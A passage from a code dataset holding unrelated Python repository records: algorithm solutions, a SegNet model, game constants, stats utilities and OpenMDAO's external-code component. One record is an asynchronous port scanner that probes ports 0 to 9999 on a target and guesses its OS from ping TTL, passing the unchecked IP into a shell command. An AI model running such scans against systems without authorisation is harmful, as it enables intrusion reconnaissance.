[1, 1, 1, 2, 2, 4], 'k': 2},\n        {'nums': [1], 'k': 1},\n    ]\n\n    print('***** Solution1 *****')\n    s = Solution1()\n    for test_case in test_cases:\n        print(s.topKFrequent(test_case['nums'], test_case['k']))\n\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"clelandgt/arithmetic","sub_path":"leetcode/347/top_k_frequent_elements.py","file_name":"top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70743271529","text":"'''\r\nOne number appears more than half the length of the array; find that number. For example, given the length-9 array {1,2,3,2,2,2,5,4,2},\r\nthe number 2 appears 5 times, which is more than half the array length, so the output is 2. If no such number exists, output 0.\r\n'''\r\n'''\r\nBy the array's structure, a number that appears more than half the time (the majority element) appears more often than all the other numbers combined. If the majority element exists,\r\nthen removing equally many majority and non-majority elements from the array each time leaves the majority element of the remaining array unchanged. So we can keep a counter, initialized to 1,\r\nand compare each number from the second one onward against the 'first' one: increment the counter on a match, otherwise decrement it. When the counter reaches zero, the prefix so far can be discarded,\r\nthe majority candidate becomes the new current element, and the counter resets to 1; iterate this way to the end. If the final counter is nonzero, the majority element exists; otherwise it does not.\r\n'''\r\n\r\n\r\nclass Solution:\r\n    def majority_candidate(self, numbers):\r\n        if not numbers:\r\n            return 0\r\n\r\n        
# Initial majority candidate is the first element\r\n        maj = numbers[0]\r\n        # Initialize the counter\r\n        count = 1\r\n        for i in range(1, len(numbers)):\r\n            # Whenever the counter reaches zero, the prefix seen so far can be discarded\r\n            if count == 0:\r\n                # The majority candidate becomes the new current element\r\n                maj = numbers[i]\r\n                # Reset the counter to 1\r\n                count = 1\r\n\r\n            elif numbers[i] == maj:\r\n                # Update the balance counter accordingly\r\n                count += 1\r\n\r\n            else:\r\n                count -= 1\r\n                # If the counter is zero, no majority element exists; return 0\r\n                if not count:\r\n                    return 0\r\n\r\n        # At this point, if a majority element exists it can only be maj, though the converse is not necessarily true\r\n        return maj\r\n\r\n\r\nS = Solution()\r\nprint(S.majority_candidate([1, 2, 3, 2, 2, 2, 5, 4, 2]))\r\nprint(S.majority_candidate([1, 2, 3, 3, 3, 3, 4]))\r\nprint(S.majority_candidate([1, 2]))\r\nprint(S.majority_candidate([]))\r\n\r\n","repo_name":"iamTanTanTan/python_programming","sub_path":"028数组中出现次数超过一半的数字.py","file_name":"028数组中出现次数超过一半的数字.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71400238888","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass SegnetDownConv(nn.Module):\n    def __init__(self, in_channels, out_channels, num_layers):\n        super(SegnetDownConv, self).__init__()\n        self.conv = self.__make_layers(in_channels, out_channels, num_layers)\n\n    def __make_layers(self, in_channels, out_channels, num_layers):\n        layers = []\n        layer_1 = nn.Sequential(\n            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n            nn.BatchNorm2d(out_channels),\n            nn.ReLU()\n        )\n        layers.append(layer_1)\n        for i in range(0, num_layers - 1):\n            layer_i = nn.Sequential(\n                nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n                nn.BatchNorm2d(out_channels),\n                nn.ReLU()\n            )\n            layers.append(layer_i)\n        return nn.Sequential(*layers)\n\n    def forward(self, x):\n        return self.conv(x)\n\n\nclass SegnetUpConv(nn.Module):\n    def __init__(self, in_channels, out_channels, num_layers):\n        super(SegnetUpConv, self).__init__()\n        self.conv = self.__make_layers(in_channels, out_channels, num_layers)\n\n    def __make_layers(self, in_channels, out_channels, num_layers):\n        layers = []\n        for i in range(0, num_layers - 1):\n            layer_i = nn.Sequential(\n                nn.ConvTranspose2d(in_channels=in_channels, out_channels=in_channels, kernel_size=(3, 3), padding=(1, 1)),\n                nn.BatchNorm2d(in_channels),\n                nn.ReLU()\n            )\n            layers.append(layer_i)\n        layer_n = nn.Sequential(\n            nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n            nn.BatchNorm2d(out_channels),\n            nn.ReLU()\n        )\n        layers.append(layer_n)\n        return nn.Sequential(*layers)\n\n    def forward(self, x):\n        return self.conv(x)\n\n\nclass SegNet(nn.Module):\n    def __init__(self, in_channels, out_channels):\n        super(SegNet, self).__init__()\n\n        self.encoder_0 = SegnetDownConv(in_channels=in_channels, out_channels=64, num_layers=2)\n        self.encoder_1 = SegnetDownConv(in_channels=64, out_channels=128, num_layers=2)\n        self.encoder_2 = SegnetDownConv(in_channels=128, out_channels=256, num_layers=3)\n        self.encoder_3 = SegnetDownConv(in_channels=256, out_channels=512, num_layers=3)\n        self.encoder_4 = SegnetDownConv(in_channels=512, out_channels=512, num_layers=3)\n\n        self.decoder_4 = SegnetUpConv(in_channels=512, out_channels=512, num_layers=3)\n        self.decoder_3 = SegnetUpConv(in_channels=512, out_channels=256, num_layers=3)\n        self.decoder_2 = SegnetUpConv(in_channels=256, out_channels=128, num_layers=3)\n        self.decoder_1 = SegnetUpConv(in_channels=128, out_channels=64, num_layers=2)\n        self.decoder_0 = SegnetUpConv(in_channels=64, 
out_channels=64, num_layers=1)\n self.final_layer = nn.ConvTranspose2d(in_channels=64, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1))\n\n self.max_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2), return_indices=True)\n\n def forward(self, x):\n dim_0 = x.size()\n x = self.encoder_0(x)\n x, i0 = self.max_pool(x)\n\n dim_1 = x.size()\n x = self.encoder_1(x)\n x, i1 = self.max_pool(x)\n\n dim_2 = x.size()\n x = self.encoder_2(x)\n x, i2 = self.max_pool(x)\n\n dim_3 = x.size()\n x = self.encoder_3(x)\n x, i3 = self.max_pool(x)\n\n dim_4 = x.size()\n x = self.encoder_4(x)\n x, i4 = self.max_pool(x)\n\n x = F.max_unpool2d(x, indices=i4, kernel_size=(2, 2), stride=(2, 2), output_size=dim_4)\n x = self.decoder_4(x)\n\n x = F.max_unpool2d(x, indices=i3, kernel_size=(2, 2), stride=(2, 2), output_size=dim_3)\n x = self.decoder_3(x)\n\n x = F.max_unpool2d(x, indices=i2, kernel_size=(2, 2), stride=(2, 2), output_size=dim_2)\n x = self.decoder_2(x)\n\n x = F.max_unpool2d(x, indices=i1, kernel_size=(2, 2), stride=(2, 2), output_size=dim_1)\n x = self.decoder_1(x)\n\n x = F.max_unpool2d(x, indices=i0, kernel_size=(2, 2), stride=(2, 2), output_size=dim_0)\n x = self.decoder_0(x)\n\n x = self.final_layer(x)\n return x\n\n\nif __name__ == '__main__':\n model = SegNet(1, 1)\n xx = torch.randn(1, 1, 256, 256)\n yy = model(xx)\n print(yy.shape)","repo_name":"istvan-stv-nagy/master_project","sub_path":"implementation/net/segnet.py","file_name":"segnet.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69863811368","text":"from globals import *\nimport pygame as pg\n\n############ name constants #############\nWINDOW_TITLE = \"ETE - EarToEye\" \n\n############ path constants #############\nIMG_PATH = \"img/\"\nSOUND_PATH = \"track/\"\n\n############ display constants ##############\nNB_COLORS = 40\nMATRIX_FPS = 1\nCORREL_INTERVAL = 1\nCORREL_THRESHOLD = 0.01\n\n############ size constants #############\nBUTTON_SIZE = (SCREEN_WIDTH / 10, SCREEN_HEIGHT * 4 / 100)\nTRACK_INDENT = SCREEN_WIDTH * 3 / 100\nTRACK_WIDTH = SCREEN_WIDTH * 3 / 10\nTRACK_HEIGHT = 2 * (SCREEN_HEIGHT / 24)\nTRACK_SIZE = (TRACK_WIDTH, TRACK_HEIGHT)\nLINE_SHIFT = (SCREEN_WIDTH - TRACK_WIDTH) / 10\nLINE_OVERTRACK = TRACK_HEIGHT / 10\nLINE_OFFSET = SCREEN_WIDTH / 60\nTRACK_PIXPERSEC = SCREEN_WIDTH / 30\nPIECE_WIDTH = SCREEN_WIDTH / 2\n# MATRIX_POS = (TRACK_INDENT + TRACK_WIDTH, TRACK_INDENT)\n# MATRIX_SIZE = min(SCREEN_WIDTH - MATRIX_POS[0], SCREEN_HEIGHT - MATRIX_POS[1] - TRACK_INDENT)\nSHADE_HEIGHT = TRACK_INDENT / 2\nMATRIX_OFFSET = min(SCREEN_WIDTH, SCREEN_HEIGHT)/10\nMATRIX_SIZE = min(SCREEN_WIDTH - TRACK_WIDTH - SHADE_HEIGHT * 2, SCREEN_HEIGHT - TRACK_INDENT - SHADE_HEIGHT * 2)-MATRIX_OFFSET\n#MATRIX_SIZE = min(SCREEN_WIDTH - TRACK_WIDTH - SHADE_HEIGHT * 2, (SCREEN_HEIGHT- SHADE_HEIGHT-MATRIX_OFFSET)*NB_COLORS/(NB_COLORS + 2))\nMATRIX_POS = (SCREEN_WIDTH - MATRIX_SIZE, TRACK_INDENT + 2 * SHADE_HEIGHT)\n#MATRIX_POS = (SCREEN_WIDTH - MATRIX_SIZE, SCREEN_HEIGHT - MATRIX_S-MATRIX_OFFSET)\n\n############ limits and enumerations ###########\nPLAYER_STOPPED = 0\nPLAYER_PAUSED = 1\nPLAYER_PLAYED = 2\nVISU_NONE = 0 #no visualisation \nVISU_RTHM = 1 #rythmic visualisation\nVISU_MELO = 2 #melodic visualisation\nVISU_MULT = 3 #multi-track global rythm visualisation\n\n########### color constants ############\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nDARKGRAY = ( 64, 64, 64)\nGRAY = (128, 128, 128)\nLIGHTGRAY = (212, 208, 
200)\r\nRED = (255, 0, 0)\r\nGREEN = ( 0, 255, 0)\r\nMUTE_ON_COLOR = RED\r\nMUTE_OFF_COLOR = BLACK\r\n\r\n########### computing constants #########\r\nSAMPLE_RATE = 44100\r\nHOP_LENGTH = 1024\r\n\r\n\r\n","repo_name":"Jedyle/music-analysis","sub_path":"src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24470971667","text":"#!/usr/bin/python3\n\nimport socket, os, time, pyfiglet,sys,urllib,asyncio,re,subprocess\nfrom os import system\nfrom datetime import datetime\nfrom os import name, truncate\nfrom colorama import *\n\n###\n\n\n\n\n\n####HELP_Panel\n\nif len(sys.argv) !=2:\n    print(\"\\n[i] Usage: python3 \" + sys.argv[0] + \" <IP>\\n\")\n    sys.exit(1)\n###################################\n\nip_adress=sys.argv[1]\nport_list=[]\nopen_ports=[]\n\n\n## Determine the target operating system\ndef get_ttl(ip):\n    \n    \n    proc= subprocess.Popen([\"/usr/bin/ping -c 1 %s\" %ip_adress , \"\" ], stdout=subprocess.PIPE, shell=True)\n    (out,err)=proc.communicate() \n    \n    out=out.split()\n\n    out=out[12].decode('utf-8')\n    \n    ttl_value = re.findall(r\"\\d{1,3}\", out)[0]\n    \n    return ttl_value\n\ndef get_OS(ttl):\n    \n    ttl=int(ttl)\n    if ttl >=0 and ttl <= 64:\n        return \"LINUX\"\n    elif ttl >= 65 and ttl <=128:\n        return \"WINDOWS\"\n    else:\n        return \"Not Found\"\n    \ndef what_OS():\n    #ip_adress=sys.argv[1]    \n    ttl=get_ttl(ip_adress)    \n    os_name=get_OS(ttl)\n    print(\"O.S -> |\",os_name,\"|\")\n###########################################################################################\n\nfor port in range(0,10000):\n    port_list.append(port)\n    \n\ndef banner():\n    ascii_banner= pyfiglet.figlet_format('ScanPort')\n    print (Fore.LIGHTCYAN_EX + ascii_banner)\n    print(\"   made by\" +Fore.LIGHTRED_EX +\" Sharker3312\")\n    print(Fore.LIGHTCYAN_EX +\"-\" *50)\n    print(\"Scanning Target: \" + ip_adress )\n    print(\"Scanning Target at: \"+str(datetime.now()))\n    print(\"-\"*50+ Fore.YELLOW)\n    \n    \ndef clear():\n    if os.name ==\"nt\":\n        os.system(\"cls\")\n    else:\n        os.system(\"clear\") \n\n\nasync def check_port(ip, port, loop):\n    \n    conn = asyncio.open_connection(ip_adress, port, loop=loop)\n    try:\n        reader, writer = await asyncio.wait_for(conn, timeout=3)\n        open_ports.append(port)\n    except:\n        print(\"\",end=\"\\r\")\n    finally:\n        if 'writer' in locals():\n            writer.close()\n    \nasync def check_port_sem(sem, ip, port, loop):\n    async with sem:\n        return await check_port(ip, port, loop)\n    \nasync def run(dests, ports, loop):\n    \n    sem = asyncio.Semaphore(1000) #Change this value for concurrency limitation \n    tasks = [asyncio.ensure_future(check_port_sem(sem, d, p, loop)) for d in dests for p in ports]\n    #for i in range(0,10000):\n    #   porc=float(i/10000)*100\n    #  porc=round(porc, 1)\n    #print(porc,\"%\",end=\"\\r\")\n    #time.sleep(0.005)\n        \n    responses = await asyncio.gather(*tasks)\n    return responses\n\ndef menu():\n    clear()\n    banner()\n    dests = [ip_adress]  #destinations  \n    ports = port_list   #ports   \n    loop = asyncio.get_event_loop()\n    future = asyncio.ensure_future(run(dests, ports, loop))\n    loop.run_until_complete(future)\n    print(open_ports,\"-> OPEN\")\n    what_OS()\n    print(Fore.LIGHTCYAN_EX+'-'*50)\n\n    \n\nif __name__=='__main__':\n    \n    menu()\n    ","repo_name":"Sharker3312/ScanPort-Asynchronous","sub_path":"ascanport.py","file_name":"ascanport.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222156929","text":"class Solution:\n    # @param 
prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n n = len(prices)\n if n < 2:\n return 0\n \n sell = {}\n buy = {}\n res = 0\n \n prev_price = 1<<30\n for i in range(n):\n sell[i] = max(0, prices[i] - prev_price)\n prev_price = min(prev_price, prices[i])\n res = max(res, sell[i])\n \n aftr_price = -1<<30\n for i in range(n - 1, -1, -1):\n buy[i] = max(0, aftr_price - prices[i])\n aftr_price = max(aftr_price, prices[i])\n \n for i in range(1, n):\n sell[i] = max(sell[i], sell[i-1])\n \n for i in range(n - 2, -1, -1):\n buy[i] = max(buy[i], buy[i+1])\n \n for i in range(n - 1):\n res = max(res, sell[i] + buy[i+1])\n \n return res\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31969957300","text":"import numpy as np\nimport pandas as pd\nimport helpers\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict, GridSearchCV\nfrom sklearn.metrics import precision_score, recall_score, f1_score, confusion_matrix, precision_recall_curve, roc_curve\n\n#load data\nX_raw_data = pd.read_csv('../data/multiclass/X.csv', header=None)\ny_raw_data = pd.read_csv('../data/multiclass/y.csv', header=None)\n\n#remove the training set\nX_training, X_testing, y_training, y_testing = train_test_split(X_raw_data, y_raw_data, test_size = 0.2, random_state = 78, stratify=y_raw_data)\n\n#sort the data\nX_training = X_training.sort_index()\ny_training = y_training.sort_index()\n\n#standardize the data\nX = StandardScaler().fit_transform(X_training)\n\n#Principal component analysis\npca = PCA(n_components=2)\ndata = pca.fit_transform(X)\n\nprincipalDf = pd.DataFrame(data = data, columns = ['principal component 1', 'principal component 2'])\n\n\nX1_y0 = principalDf.iloc[0:32,0]\nX2_y0 = principalDf.iloc[0:32,1]\nX1_y1 = principalDf.iloc[32:64,0]\nX2_y1 = principalDf.iloc[32:64,1]\nX1_y2 = principalDf.iloc[64:96,0]\nX2_y2 = principalDf.iloc[64:96,1]\nX1_y3 = principalDf.iloc[96:128,0]\nX2_y3 = principalDf.iloc[96:128,1]\nX1_y4 = principalDf.iloc[128:160,0]\nX2_y4 = principalDf.iloc[128:160,1]\n\nplt.scatter(X1_y0, X2_y0, color='orange') #air\nplt.scatter(X1_y1, X2_y1, color='blue') #book\nplt.scatter(X1_y2, X2_y2, color='green') #hand\nplt.scatter(X1_y3, X2_y3, color='purple') #knife\nplt.scatter(X1_y4, X2_y4, color='red') #plastic case\nplt.xlabel('X1')\nplt.ylabel('X2')\nplt.title(\"Principal Component Analysis - Two Features - Multiclass Data\")\nplt.show()\n","repo_name":"dgarnitz-zz/Radar-Classification","sub_path":"src/PCA-Multiclass.py","file_name":"PCA-Multiclass.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14428701329","text":"\"\"\"\nErina Stats Managing API\n\"\"\"\n\nfrom time import time\n\nfrom filecenter import extension_from_base, files_in_dir\nfrom safeIO import TextFile\nfrom Erina.stats import files\nfrom Erina.config import Erina as ErinaConfig\nfrom Erina.env_information import erina_dir\n\napi = files.apiStats()\ndb = files.dbStats()\ndiscord = files.discordStats()\nerinahash = files.erinahashStats()\nerina = files.erinaStats()\nexternal = 
files.externalStats()\nline = files.lineStats()\nsearch = files.searchStats()\ntwitter = files.twitterStats()\n\ndef StatsAppend(file, content=None):\n \"\"\"\n Appends a new stat event to the given file\n \"\"\"\n if ErinaConfig.stats:\n if content is not None:\n file.append(f\"{str(int(time()))} {str(content)}\".replace(\"\\n\", \"\") + \"\\n\")\n else:\n file.append(str(int(time())) + \"\\n\")\n\ndef StatsReset():\n \"\"\"\n Resets the stats\n \"\"\"\n api.searchEndpointCall.write(\"\")\n db.erinaDatabaseLookups.write(\"\")\n db.manamiDBTitleVectorLookups.write(\"\")\n discord.descriptionHit.write(\"\")\n discord.imageSearchHit.write(\"\")\n discord.infoHit.write(\"\")\n erinahash.createdBase64String.write(\"\")\n erinahash.createdHashes.write(\"\")\n erina.cacheFilesCount.write(\"\")\n erina.erinaParsingCount.write(\"\")\n erina.errorsCount.write(\"\")\n erina.fileIOCounter.write(\"\")\n external.anilistAPICalls.write(\"\")\n external.iqdbCalls.write(\"\")\n external.saucenaoAPICalls.write(\"\")\n external.tracemoeAPICalls.write(\"\")\n line.descriptionHit.write(\"\")\n line.imageSearchHit.write(\"\")\n line.infoHit.write(\"\")\n line.storedImages.write(\"\")\n search.searchCount.write(\"\")\n search.anilistIDSearchCount.write(\"\")\n search.imageSearchCount.write(\"\")\n search.titleSearchCount.write(\"\")\n twitter.askingHit.write(\"\")\n twitter.directMessagingHit.write(\"\")\n twitter.responsePolarity.write(\"\")\n twitter.responses.write(\"\")\n twitter.streamHit.write(\"\")\n for file in files_in_dir(erina_dir + \"/Erina/stats/userdefinedStats\"):\n if extension_from_base(file) == \".erinalog\":\n TextFile(erina_dir + \"/Erina/stats/userdefinedStats\").delete()\n ","repo_name":"Animenosekai/Project_Erina","sub_path":"Erina/erina_stats.py","file_name":"erina_stats.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"16589930676","text":"\nfrom os import environ\nfrom Utils.Repeats import handler, get_body\nfrom Utils.Sns import SNSInvoke\n\n\n@handler\ndef test5(event, context):\n body = get_body(event)\n data = SNSInvoke.create_sns_subscription(\n body, environ.get('SNS_TOPIC_ARN'))\n if data['ResponseMetadata'][\"HTTPStatusCode\"] == 200:\n msg = {\"msg\": \"Comentario creado satisfactoriamente\"}\n else:\n msg = {\"msg\": \"Error: Fallo en creación de comentario\"}\n return msg\n","repo_name":"Leisy17/sqlalchemy-practica2","sub_path":"handlers/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"206327072","text":"from turtle import Turtle\n\nSTEP = 20\n\n\nclass Paddle(Turtle):\n def __init__(self, coordinates):\n super().__init__()\n self.shape('square')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.color('white')\n self.penup()\n self.goto(coordinates)\n\n# Moves the paddle UP direction\n def up(self):\n # self.pong.forward(MOVE_DISTANCE)\n if self.ycor() <= 230:\n new_y = self.ycor() + STEP\n self.goto(self.xcor(), new_y)\n\n# Moves the paddle DOWN direction\n def down(self):\n # self.paddle.backward(MOVE_DISTANCE)\n if self.ycor() >= -230:\n new_y = self.ycor() - STEP\n self.goto(self.xcor(), new_y)\n\n\n\n","repo_name":"Firdavs0636/Turtle_Pong_Game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"823665826","text":"Import('env')\nfrom os.path import join, realpath\n\nsrc_filter = []\ncppdefines = []\n\nframework = env.get(\"PIOFRAMEWORK\")[0]\nif framework == 'zephyr':\n src_filter=[\"+<*>\",\n \"-\",\n \"-\",\n \"-\",\n \"-\"]\n cppdefines=[\"ZENOH_ZEPHYR\"]\n\nelif framework == 'arduino':\n platform = env.get(\"PIOPLATFORM\")\n if platform == 'espressif32':\n src_filter=[\"+<*>\",\n \"-\",\n \"-\",\n \"-\",\n \"-\"]\n cppdefines=[\"ZENOH_ESP32\"]\n\n\nenv.Append(SRC_FILTER=src_filter)\nenv.Append(CPPDEFINES=cppdefines)\n\n# pass flags to a global build environment (for all libraries, etc)\nglobal_env = DefaultEnvironment()\nglobal_env.Append(CPPDEFINES=cppdefines)\n","repo_name":"gabrik/esp32-zenoh-pico","sub_path":"play/zenoh-pico/extra_script.py","file_name":"extra_script.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9341798310","text":"\"\"\"Define the ExternalCodeComp and ExternalCodeImplicitComp classes.\"\"\"\nimport os\nimport sys\nimport re\n\nfrom shutil import which\n\nfrom openmdao.core.analysis_error import AnalysisError\nfrom openmdao.core.explicitcomponent import ExplicitComponent\nfrom openmdao.core.implicitcomponent import ImplicitComponent\nfrom openmdao.utils.shell_proc import STDOUT, DEV_NULL, ShellProc\n\n\nclass ExternalCodeDelegate(object):\n \"\"\"\n Handles all the methods related to running a code externally.\n\n Parameters\n ----------\n comp : ExternalCodeComp or ExternalCodeImplicitComp object\n The external code object this delegate is associated with.\n\n Attributes\n ----------\n _comp : ExternalCodeComp or ExternalCodeImplicitComp object\n The external code object this delegate is associated with.\n \"\"\"\n\n def __init__(self, comp):\n \"\"\"\n Initialize.\n \"\"\"\n self._comp = comp\n\n def declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n \"\"\"\n comp = self._comp\n\n comp.options.declare('command', [], types=(list, str),\n desc=\"Command to be executed. If it is a string, then this is the \"\n \"command line to execute and the 'shell' argument to \"\n \"'subprocess.Popen()' is set to True. \"\n \"If it is a list; the first entry is the command to execute.\")\n comp.options.declare('env_vars', {}, desc='Environment variables required by the command.')\n comp.options.declare('poll_delay', 0.0, lower=0.0,\n desc='Delay between polling for command completion. '\n 'A value of zero will use an internally computed default.')\n comp.options.declare('timeout', 0.0, lower=0.0,\n desc='Maximum time to wait for command completion. 
'\n                                  'A value of zero implies an infinite wait.')\n        comp.options.declare('external_input_files', [],\n                             desc='List of input files that must exist before execution, '\n                                  'otherwise an Exception is raised.')\n        comp.options.declare('external_output_files', [],\n                             desc='List of output files that must exist after execution, '\n                                  'otherwise an Exception is raised.')\n        comp.options.declare('fail_hard', types=bool, default=True,\n                             desc=\"If True, external code errors raise a 'hard' exception \"\n                                  \"(RuntimeError), otherwise errors raise a 'soft' exception \"\n                                  \"(AnalysisError).\")\n        comp.options.declare('allowed_return_codes', [0],\n                             desc=\"List of return codes that are considered successful.\")\n\n    def check_config(self, logger):\n        \"\"\"\n        Perform optional error checks.\n\n        Parameters\n        ----------\n        logger : object\n            The object that manages logging output.\n        \"\"\"\n        # check for the command\n        comp = self._comp\n\n        cmd = [c for c in comp.options['command'] if c.strip()]\n        if not cmd:\n            logger.error(\"The command cannot be empty\")\n        else:\n            program_to_execute = comp.options['command'][0]\n            if sys.platform == 'win32':\n                if not which(program_to_execute):\n                    missing = self._check_for_files([program_to_execute])\n                    if missing:\n                        logger.error(\"The command to be executed, '%s', \"\n                                     \"cannot be found\" % program_to_execute)\n            else:\n                if not which(program_to_execute):\n                    logger.error(\"The command to be executed, '%s', \"\n                                 \"cannot be found\" % program_to_execute)\n\n        # Check for missing input files. This just generates a warning during\n        # setup, since these files may be generated later during execution.\n        missing = self._check_for_files(comp.options['external_input_files'])\n        if missing:\n            logger.warning(\"The following input files are missing at setup \"\n                           \"time: %s\" % missing)\n\n    def _check_for_files(self, files):\n        \"\"\"\n        Check that specified files exist.\n\n        Parameters\n        ----------\n        files : iterable\n            Contains files to check.\n\n        Returns\n        -------\n        list\n            List of files that do not exist.\n        \"\"\"\n        return [path for path in files if not os.path.exists(path)]\n\n    def run_component(self, command=None):\n        \"\"\"\n        Run this component.\n\n        User should call this method from their overridden compute method.\n\n        Parameters\n        ----------\n        command : list\n            Optional command. Otherwise use the command in self.options['command'].\n        \"\"\"\n        comp = self._comp\n\n        if not command:\n            command = comp.options['command']\n\n        comp.return_code = -12345678\n\n        if not command:\n            raise ValueError('Empty command list')\n\n        if comp.options['fail_hard']:\n            err_class = RuntimeError\n        else:\n            err_class = AnalysisError\n\n        return_code = None\n\n        try:\n            missing = self._check_for_files(comp.options['external_input_files'])\n            if missing:\n                raise err_class(\"The following input files are missing: %s\"\n                                % sorted(missing))\n            return_code, error_msg = self._execute_local(command)\n\n            if return_code is None:\n                raise AnalysisError('Timed out after %s sec.' 
%\n                                    comp.options['timeout'])\n\n            elif return_code not in comp.options['allowed_return_codes']:\n                if isinstance(comp.stderr, str):\n                    if os.path.exists(comp.stderr):\n                        with open(comp.stderr, 'r') as stderrfile:\n                            error_desc = stderrfile.read()\n                        err_fragment = \"\\nError Output:\\n%s\" % error_desc\n                    else:\n                        err_fragment = \"\\n[stderr %r missing]\" % comp.stderr\n                else:\n                    err_fragment = error_msg\n\n                raise err_class('return_code = %d%s' % (return_code,\n                                                        err_fragment))\n\n            missing = self._check_for_files(comp.options['external_output_files'])\n            if missing:\n                raise err_class(\"The following output files are missing: %s\"\n                                % sorted(missing))\n\n        finally:\n            comp.return_code = -999999 if return_code is None else return_code\n\n    def _execute_local(self, command):\n        \"\"\"\n        Run the command.\n\n        Parameters\n        ----------\n        command : list\n            List containing OS command string.\n\n        Returns\n        -------\n        int\n            Return Code\n        str\n            Error Message\n        \"\"\"\n        # Check to make sure command exists\n        comp = self._comp\n\n        if isinstance(command, str):\n            program_to_execute = re.findall(r\"^([\\w\\-]+)\", command)[0]\n        else:\n            program_to_execute = command[0]\n\n        if sys.platform == 'win32':\n            if not which(program_to_execute):\n                missing = self._check_for_files([program_to_execute])\n                if missing:\n                    raise ValueError(\"The command to be executed, '%s', \"\n                                     \"cannot be found\" % program_to_execute)\n            if isinstance(command, list):\n                command_for_shell_proc = ['cmd.exe', '/c'] + command\n            else:\n                command_for_shell_proc = 'cmd.exe /c ' + str(command)\n\n        else:\n            if not which(program_to_execute):\n                raise ValueError(\"The command to be executed, '%s', \"\n                                 \"cannot be found\" % program_to_execute)\n            command_for_shell_proc = command\n\n        comp._process = \\\n            ShellProc(command_for_shell_proc, comp.stdin,\n                      comp.stdout, comp.stderr, comp.options['env_vars'])\n\n        try:\n            return_code, error_msg = \\\n                comp._process.wait(comp.options['poll_delay'], comp.options['timeout'])\n        finally:\n            comp._process.close_files()\n            comp._process = None\n\n        return (return_code, error_msg)\n\n\nclass ExternalCodeComp(ExplicitComponent):\n    \"\"\"\n    Run an external code as a component.\n\n    Default stdin is the 'null' device, default stdout is the console, and\n    default stderr is ``external_code_comp_error.out``.\n\n    Parameters\n    ----------\n    **kwargs : dict of keyword arguments\n        Keyword arguments that will be mapped into the Component options.\n\n    Attributes\n    ----------\n    stdin : str or file object\n        Input stream external code reads from.\n    stdout : str or file object\n        Output stream external code writes to.\n    stderr : str or file object\n        Error stream external code writes to.\n    _external_code_runner : ExternalCodeDelegate object\n        The delegate object that handles all the running of the external code for this object.\n    return_code : int\n        Exit status of the child process.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Initialize the ExternalCodeComp component.\n        \"\"\"\n        self._external_code_runner = ExternalCodeDelegate(self)\n        super().__init__(**kwargs)\n\n        self.stdin = DEV_NULL\n        self.stdout = None\n        self.stderr = \"external_code_comp_error.out\"\n\n        self.return_code = 0\n\n    def _declare_options(self):\n        \"\"\"\n        Declare options before kwargs are processed in the init method.\n\n        Options are declared here because this class is intended to be subclassed by\n        the end user. 
The `initialize` method is left available for user-defined options.\n        \"\"\"\n        super()._declare_options()\n        self._external_code_runner.declare_options()\n\n    def check_config(self, logger):\n        \"\"\"\n        Perform optional error checks.\n\n        Parameters\n        ----------\n        logger : object\n            The object that manages logging output.\n        \"\"\"\n        # check for the command\n        self._external_code_runner.check_config(logger)\n\n    def compute(self, inputs, outputs):\n        \"\"\"\n        Run this component.\n\n        User should call this method from their overridden compute method.\n\n        Parameters\n        ----------\n        inputs : Vector\n            Unscaled, dimensional input variables read via inputs[key].\n        outputs : Vector\n            Unscaled, dimensional output variables read via outputs[key].\n        \"\"\"\n        self._external_code_runner.run_component()\n\n\nclass ExternalCodeImplicitComp(ImplicitComponent):\n    \"\"\"\n    Run an external code as a component.\n\n    Default stdin is the 'null' device, default stdout is the console, and\n    default stderr is ``external_code_comp_error.out``.\n\n    Parameters\n    ----------\n    **kwargs : dict of keyword arguments\n        Keyword arguments that will be mapped into the Component options.\n\n    